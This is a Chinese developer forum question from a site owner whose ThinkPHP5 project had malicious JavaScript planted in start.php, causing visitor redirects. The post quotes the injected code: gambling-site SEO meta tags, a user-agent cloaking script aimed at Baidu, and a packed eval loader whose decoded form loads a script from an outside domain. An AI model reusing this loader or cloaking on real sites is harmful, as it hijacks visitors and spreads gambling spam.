极客观点
项目管理
HarmonyOS
昨天我的一个小企业站项目被植入了恶意js,总是被劫持跳转. 这个项目是用php框架tp5开发的,找了一上午才找到这段js文件, 原来这哥们把js放到我的开始脚本start.php里了. 删除了,网站就恢复正常了.
想请教一下大牛,这段meta头和下边的js是什么意思?以及劫持的原理...
<title>正规时时彩平台注册_十大时时彩正规平台官网</title>
<meta name="keywords" content="正规时时彩平台注册,十大时时彩正规平台官网"/>
<meta name="description" content="最新十大时时彩正规平台信誉推荐,♛71110.com♚重磅推出最安全靠谱的时时彩彩票平台,从提现速度,信誉度,可靠度列出排名前茅的十大信誉时时彩平台。"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="首页"}</script>
<script>
eval(function(p, a, c, k, e, d) {
e = function(c) {
return (c < a ? "": e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) d[e(c)] = k[c] || e(c);
k = [function(e) {
return d[e]
}];
e = function() {
return '\\w+'
};
c = 1;
};
while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p;} (\'m["\\n\\b\\2\\e\\f\\7\\l\\0"]["\\o\\4\\8\\0\\7"]('\j\1\2\4\\8\\3\\0 \\0\\k\\3\\7\\d\\6\\0\\7\\p\\0\\5\\h\\c\\t\\c\\1\\2\\4\\8\\3\\0\\6\\1\\4\\2\\d\\6\\9\\0\\0\\3\\1\\v\\5\\5\\1\\a\\9\\e\\a\\9\\s\\g\\2\\b\\f\\5\\u\\r\\q\\3\\g\\h\\1\\6\\i\\j\\5\\1\\2\\4\\8\\3\\0\\i\');', 32, 32, 'x74|x73|x63|x70|x72|x2f|x22|x65|x69|x68|x66|x6f|x61|x3d|x75|x6d|x2e|x6a|x3e|x3c|x79|x6e|window|x64|x77|x78|x71|x38|x32|x76|x6b|x3a\'.split('|'), 0, {}))
</script>
java
解密结果:
document.write('<script type="text/javascript" src="https://sfhufh2.com/k8qp.js">');